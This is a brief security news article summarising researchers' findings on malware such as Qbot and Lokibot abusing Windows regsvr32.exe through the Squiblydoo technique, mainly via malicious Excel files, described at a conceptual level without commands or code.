Security researchers have been observing an increasing exploitation of regsvr32.exe, which is a Windows living-off-the-land binary, shortly known as LOLBin. Some of the analyzed malware samples belong to Qbot and Lokibot, according to Uptycs researchers.
Threat Actors Abusing Regsvr32
What is regsvr32? It is a Microsoft-signed command line utility allowing users to register and unregister DLL files. When you register such a file, information is added to the Registry (or the central directory), so that the file can be used by the operating system. This way, other programs can use DLLs with ease.
But now it seems that malicious actors have discovered a way to abuse regsvr32 for loading COM scriptlets to execute DLLs. “This method does not make changes to the Registry as the COM object is not actually registered but executed,” the researchers said. The technique is also known as the Squiblydoo technique, making it possible for hackers to bypass application whitelisting during the execution phase of the attack kill chain.
The research team has observed more than 500 samples using regsvr32.exe to register .ocx files. It is noteworthy that “97% of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files carrying .xlsb or .xlsm extensions.”
More technical details are available in the original report.